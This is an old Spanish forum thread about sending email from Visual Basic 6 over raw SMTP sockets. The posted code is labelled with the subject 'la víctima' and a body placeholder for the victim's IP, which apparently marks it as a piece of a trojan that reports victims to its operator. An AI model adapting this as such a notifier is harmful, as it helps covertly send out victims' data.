elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  como mandar email por vb6
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: como mandar email por vb6  (Leído 2,498 veces)
FLANAGAN13

Desconectado Desconectado

Mensajes: 1


Ver Perfil
como mandar email por vb6
« en: 9 Octubre 2007, 18:38 pm »


Quisiera que me ayudaran a crear un programa para mandar email desde vb6,....



saludos

Flanagan13


En línea

Xerok1!

Desconectado Desconectado

Mensajes: 228



Ver Perfil
Re: como mandar email por vb6
« Respuesta #1 en: 9 Octubre 2007, 19:06 pm »

mira un ejemplo de reydelmundo11

Código:
Private Sub Form_Load()
On Error Resume Next ' Detector de Errores Activado
 If Sock1.State <> 0 Then ' Si tiene una conexion abierta
  Sock1.Close ' Cerrar la conexion
 End If
Sock1.RemoteHost = "mx2.hotmail.com" ' Le digo cual es el Servidor de SMTP, por razones que desconozco este server ya no funciona
 Sock1.RemotePort = 25 ' El puerto a donde conectarse (SMTP)
Sock1.Connect ' Intenta la conexion...
 Enter = Chr(13) + Chr(10) ' Inicializo la variable global Enter
End Sub

Private Sub Sock1_Connect()
 On Error Resume Next ' Detector de Errores Activado
 Sock1.Tag = 1 ' Pongo que voy en el paso 1
 Sock1.SendData "HELO " & "reydelmundo11" & Enter ' Le envio un comando al Servidor y 1 Enter
End Sub

Private Sub Sock1_DataArrival(ByVal bytesTotal As Long)
 On Error Resume Next ' Detector de Errores Activado
 Sock1.GetData Datos, vbString ' Recibir en Datos

 
 If Mid(Datos, 1, 9) = "550 Relay" Then ' Revisar si permite Relay
'el servidor no deja mandar los datos sin cuenta de correo en ese caso desconectamos
  Sock1.Close ' Cerrar conexion
  Sock1.Tag = 0 ' Digo que ya se acabo
 End If
 
 If Sock1.Tag = 1 Then ' Si voy en el paso 1
  Sock1.SendData "RSET" & Enter ' Le envio RSET
  Sock1.Tag = 2 ' Digo que voy al siguiente paso
  GoTo fin ' Ir al final
 End If
 If Sock1.Tag = 2 Then ' Si voy en el paso 2
  Sock1.SendData "MAIL FROM: <" & MiMail & ">" & Enter ' Le envio MiMail mi mail es una varible asegurate de tenerla definida
  Sock1.Tag = 3 ' Digo que voy al siguiente paso
  GoTo fin ' Ir al final
 End If
 If Sock1.Tag = 3 Then ' Si voy en el paso 3
  Sock1.SendData "RCPT TO: <" & ParaMail & ">" & Enter ' Le envio ParaMail  También es otra varialbe
  If CCMail <> "-" Then ' Si tiene para un Mail CC (con copia, creo)
   Sock1.SendData "RCPT TO: <" & CCMail & ">" & Enter ' Le envio CCMail  también es otra es para enviarlo a mas gente
  End If
  Sock1.Tag = 4 ' Digo que voy al siguiente paso
  GoTo fin ' Ir al final
 End If
 If Sock1.Tag = 4 Then ' Si voy en el paso 4
  Sock1.SendData "DATA" & Enter ' Aqui le envio DATA (Empieza el mail)
  Sock1.Tag = 5 ' Digo que voy al siguiente paso
  GoTo fin ' Ir al final
 End If
 If Sock1.Tag = 5 Then ' Si voy en el paso 5
  Sock1.SendData "To: " & ParaMail & Enter ' Le envio para quien va la variable otra vez
 Sock1.SendData "From: " & "reydelmundo11" & " <" & MiMail & ">" & Enter ' El Nombre reydelmundo11 y MiMail
  Sock1.SendData "Subject: " & "la víctima" & Enter ' El Subject (Titulo)
  Sock1.SendData Enter ' Un Enter indica que empieza el Mensaje
  Sock1.SendData "Aqui vendría la ip y todo eso" & Enter ' Le envio el Mensaje
Sock1.SendData "." & Enter ' Esto indica fin del mail
  Sock1.Tag = 6 ' Digo que voy al siguiente paso
  GoTo fin ' Ir al final
 End If
 If Sock1.Tag = 6 Then ' Si voy en el paso 6
  Sock1.SendData "QUIT" & Enter ' Le indico que cierre la conexion
  Sock1.Tag = 7 ' Digo que voy al ultimo paso
  GoTo fin ' Ir al final
 End If
 If Sock1.Tag = 7 Then ' Si voy en el paso 6
  Sock1.Tag = 0 ' Digo que ya se acabo
  Sock1.Close ' Cierro la conexion
'ya lo hemos enviado

  GoTo bien ' Ir al final
 End If
bien:

End Sub

lo tenia en mi biblioteca de codes..es muy facilito,yo lo tenia adaptado,pero esq no lo encuentro :-\ :-\
mirate el protocolo smtp que es mu facil y te va a ayudar..

pd:dale las gracias a reydelmundo  :xD :xD
un saludo :P


« Última modificación: 9 Octubre 2007, 19:09 pm por Xerok1! » En línea

[Firma]Esperando haber si acaba el concurso de firmas y la pongo[/Firma]
ActiveSheet


Desconectado Desconectado

Mensajes: 389


Feeling Jazz


Ver Perfil WWW
Re: como mandar email por vb6
« Respuesta #2 en: 9 Octubre 2007, 20:10 pm »

humm eso ya no sirve xD
con eso de los socktes y con el SMTP

Seria un buena opcion con algun servidor PHP de Mail y asi seria algo como esto

htpp://serivor.gob.ar/mailsconphp?&contenido=xD&mail="nose@gmail.com"etc...

var1="&contenido=" & textbox1
var2="&mail=" & textbox2
browser.navigate var1
browser.navigate ver2
mas o menos asi

Mails con PHP

Bueno en lo personal me a servido mucho mas eso que el de sockets
« Última modificación: 9 Octubre 2007, 20:16 pm por ActiveSheet » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Mandar email directo por registro MX
Dudas Generales
peterrr 2 4,908 Último mensaje 25 Noviembre 2010, 04:28 am
por peterrr
mandar select por email
PHP
_vicho_ 1 2,733 Último mensaje 20 Noviembre 2012, 22:21 pm
por gowend
Sockets UDP, como mandar paquetes en c#?
.NET (C#, VB.NET, ASP)
lamique 0 2,346 Último mensaje 15 Mayo 2013, 19:13 pm
por lamique
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines